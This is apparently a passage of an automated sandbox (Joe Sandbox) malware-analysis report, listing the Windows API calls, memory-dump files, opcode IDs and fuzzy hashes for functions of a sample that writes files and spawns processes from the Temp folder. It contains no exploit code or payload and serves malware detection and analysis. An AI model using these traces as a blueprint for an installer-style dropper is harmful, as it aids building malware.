                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                                                                                                                          • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalFree.KERNELBASE(006BA9B0), ref: 00401C10
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                          • String ID: open
                                                                                                                                                                                          • API String ID: 3394109436-2758837156
                                                                                                                                                                                          • Opcode ID: 2e7873d53c65363ebbf06334e61aa70f6cf79d8760b6e8fa7e4ab63ec6aaec53
                                                                                                                                                                                          • Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e7873d53c65363ebbf06334e61aa70f6cf79d8760b6e8fa7e4ab63ec6aaec53
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069E6
                                                                                                                                                                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2567322000-0
                                                                                                                                                                                          • Opcode ID: 2f96d25466b50161d36a247ea1857d3da149f4b0ac0fce789d184ce1e3082720
                                                                                                                                                                                          • Instruction ID: f1848df8738bec86e5a9e013d2d1160024fdc01f5a204198474b6b1514677e65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f96d25466b50161d36a247ea1857d3da149f4b0ac0fce789d184ce1e3082720
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE09272600218BBDB009B54CD02E9E7B6ADB44704F100033BA05B6190C6B19E62DB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                          • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                                                                                          • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                                                                                                                            • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                                                                                                                            • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                                                                                                                                            • Part of subcall function 004068A5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                          • Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
                                                                                                                                                                                          • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                                                                                                                                                          • Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
                                                                                                                                                                                          • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405BF1,?,?,00000000,00405DC7,?,?,?,?), ref: 00405FF1
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406005
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                                          • Instruction ID: 701c1f243114c6c95f20a1fe0a395a260d282ed21d39929bf23a1ad3933a3a4e
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                                          • Instruction Fuzzy Hash: E9D0C972504220AFD2102728AE0889BBB55DB54271B028A35F8A9A22B0CB314C668694
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                                          • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                                                                                            • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                                                                                            • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
                                                                                                                                                                                            • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                                                                                            • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B2D
                                                                                                                                                                                            • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B3A
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                                                                            • Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
                                                                                                                                                                                            • Part of subcall function 004069C0: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
                                                                                                                                                                                            • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1543427666-0
                                                                                                                                                                                          • Opcode ID: 1e94bbcab2fbd6c959214ef1cc03fd6035723894d1f7a16309fc7884d05dd9f5
                                                                                                                                                                                          • Instruction ID: fabaa3b6efc7a57357b2805df35000a41c8f44054e7a675a900f3985a4c8ce8a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e94bbcab2fbd6c959214ef1cc03fd6035723894d1f7a16309fc7884d05dd9f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F06772905125ABDB20BBA599849DE72B59B00328B25413FE102B22E1C77C4E469AAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                          • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
